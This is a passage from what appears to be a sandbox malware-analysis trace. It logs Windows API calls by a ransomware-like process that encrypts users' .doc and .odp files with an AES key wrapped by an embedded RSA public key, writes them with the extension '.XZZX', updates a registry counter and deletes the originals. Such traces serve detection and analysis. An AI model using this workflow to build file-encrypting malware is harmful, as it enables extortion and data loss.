lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.526] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85d9 [0042.526] WriteFile (in: hFile=0x4c8, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1e, lpOverlapped=0x0) returned 1 [0042.526] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85f7 [0042.526] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.527] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85fc [0042.527] SetErrorMode (uMode=0x1) returned 0x1 [0042.527] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0042.527] OutputDebugStringW (lpOutputString="end") [0042.527] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0042.527] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0042.527] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x42d46e0) returned 1 [0042.528] CryptImportPublicKeyInfo (in: hCryptProv=0x42d46e0, dwCertEncodingType=0x1, pInfo=0x3e3f560*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f590*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f598*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e57d0) returned 1 [0042.528] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.528] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0042.528] CryptEncrypt (in: hKey=0x42e57d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0042.528] CryptEncrypt (in: hKey=0x42e57d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4768*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4768*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0042.529] WriteFile (in: hFile=0x4c8, lpBuffer=0x42d4768*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d4768*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0042.529] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0042.529] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.529] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0042.529] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0042.529] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4e4) returned 0x0 [0042.529] RegQueryValueExW (in: hKey=0x4e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x2f, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0042.529] RegCloseKey (hKey=0x4e4) returned 0x0 [0042.529] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4e4) returned 0x0 [0042.529] RegSetValueExW (in: hKey=0x4e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x30, cbData=0x4 | out: lpData=0x42cdfec*=0x30) returned 0x0 [0042.530] RegCloseKey (hKey=0x4e4) returned 0x0 [0042.530] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.530] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.530] CloseHandle (hObject=0x4c8) returned 1 [0042.531] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0042.532] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0042.532] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\hcLzjn0RCFG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\hclzjn0rcfg.odp")) returned 1 [0042.533] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\hcLzjn0RCFG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\hclzjn0rcfg.odp")) returned 0 Thread: id = 142 os_tid = 0x940 [0042.397] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.397] lstrcpyW (in: lpString1=0x417f460, lpString2="IcF1qMW8Ow.doc" | out: lpString1="IcF1qMW8Ow.doc") returned="IcF1qMW8Ow.doc" [0042.397] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.397] SetErrorMode (uMode=0x1) returned 0x1 [0042.398] lstrcpyW (in: lpString1=0x417f860, lpString2="IcF1qMW8Ow.doc" | out: lpString1="IcF1qMW8Ow.doc") returned="IcF1qMW8Ow.doc" [0042.398] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xa3c155c, Data2=0xcff6, Data3=0x4c0b, Data4=([0]=0xba, [1]=0xee, [2]=0x44, [3]=0x6, [4]=0x7, [5]=0x8b, [6]=0xaa, [7]=0x3f))) returned 0x0 [0042.398] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\IcF1qMW8Ow.doc") returned 95 [0042.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0042.398] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned 118 [0042.398] StrStrW (lpFirst="IcF1qMW8Ow.doc", lpSrch="XZZX") returned 0x0 [0042.398] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\IcF1qMW8Ow.doc", dwFileAttributes=0x20) returned 1 [0042.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\IcF1qMW8Ow.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\icf1qmw8ow.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c8 [0042.398] ReadFile (in: hFile=0x4c8, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x169e2, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x169e2, lpOverlapped=0x0) returned 1 [0042.399] CloseHandle (hObject=0x4c8) returned 1 [0042.399] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0042.400] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0042.400] SetErrorMode (uMode=0x1) returned 0x1 [0042.400] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0042.400] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4658) returned 1 [0042.403] CryptGenKey (in: hProv=0x42d4658, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5850) returned 1 [0042.751] CryptExportKey (in: hKey=0x42e5850, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0042.751] CryptExportKey (in: hKey=0x42e5850, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0042.751] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.752] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0042.752] CryptDestroyKey (hKey=0x42e5850) returned 1 [0042.752] CryptReleaseContext (hProv=0x42d47f0, dwFlags=0x0) returned 0 [0042.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\6b01ea683dc5f7920a3c155c41dddbda.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0042.753] WriteFile (in: hFile=0x4dc, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x169e2, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x169e2, lpOverlapped=0x0) returned 1 [0042.754] SetFilePointer (in: hFile=0x4dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x169e2 [0042.754] WriteFile (in: hFile=0x4dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.754] SetFilePointer (in: hFile=0x4dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x169e7 [0042.754] WriteFile (in: hFile=0x4dc, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x1c, lpOverlapped=0x0) returned 1 [0042.755] SetFilePointer (in: hFile=0x4dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16a03 [0042.755] WriteFile (in: hFile=0x4dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.755] SetFilePointer (in: hFile=0x4dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16a08 [0042.755] SetErrorMode (uMode=0x1) returned 0x1 [0042.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0042.755] OutputDebugStringW (lpOutputString="end") [0042.755] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0042.755] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0042.755] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d4878) returned 1 [0042.756] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4878, dwCertEncodingType=0x1, pInfo=0x3e3f630*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f660*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f668*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5850) returned 1 [0042.756] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.757] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0042.757] CryptEncrypt (in: hKey=0x42e5850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0042.757] CryptEncrypt (in: hKey=0x42e5850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4900*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4900*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0042.757] WriteFile (in: hFile=0x4dc, lpBuffer=0x42d4900*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d4900*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0042.757] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0042.757] WriteFile (in: hFile=0x4dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.757] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0042.757] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0042.757] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4e8) returned 0x0 [0042.757] RegQueryValueExW (in: hKey=0x4e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x30, lpcbData=0x417dfdc*=0x4) returned 0x0 [0042.757] RegCloseKey (hKey=0x4e8) returned 0x0 [0042.757] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4e8) returned 0x0 [0042.757] RegSetValueExW (in: hKey=0x4e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x31, cbData=0x4 | out: lpData=0x417dfec*=0x31) returned 0x0 [0042.757] RegCloseKey (hKey=0x4e8) returned 0x0 [0042.758] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.758] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.758] CloseHandle (hObject=0x4dc) returned 1 [0042.759] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0042.760] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0042.760] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\IcF1qMW8Ow.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\icf1qmw8ow.doc")) returned 1 [0042.764] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\IcF1qMW8Ow.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\icf1qmw8ow.doc")) returned 0 Thread: id = 143 os_tid = 0x92c [0042.573] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.574] lstrcpyW (in: lpString1=0x42cf460, lpString2="Ld7trnreSqi.doc" | out: lpString1="Ld7trnreSqi.doc") returned="Ld7trnreSqi.doc" [0042.574] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.574] SetErrorMode (uMode=0x1) returned 0x1 [0042.574] lstrcpyW (in: lpString1=0x42cf860, lpString2="Ld7trnreSqi.doc" | out: lpString1="Ld7trnreSqi.doc") returned="Ld7trnreSqi.doc" [0042.574] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x7b96a6c6, Data2=0x3fda, Data3=0x406d, Data4=([0]=0x87, [1]=0x35, [2]=0xf9, [3]=0xfb, [4]=0x92, [5]=0x5, [6]=0xa4, [7]=0xa9))) returned 0x0 [0042.574] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\Ld7trnreSqi.doc") returned 96 [0042.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0042.574] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned 118 [0042.574] StrStrW (lpFirst="Ld7trnreSqi.doc", lpSrch="XZZX") returned 0x0 [0042.574] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\Ld7trnreSqi.doc", dwFileAttributes=0x20) returned 1 [0042.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\Ld7trnreSqi.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\ld7trnresqi.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0042.574] ReadFile (in: hFile=0x4dc, lpBuffer=0x42d3050, nNumberOfBytesToRead=0x10b9, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42d3050*, lpNumberOfBytesRead=0x42ce418*=0x10b9, lpOverlapped=0x0) returned 1 [0042.575] CloseHandle (hObject=0x4dc) returned 1 [0042.575] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0042.576] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0042.576] SetErrorMode (uMode=0x1) returned 0x1 [0042.576] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0042.576] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d47f0) returned 1 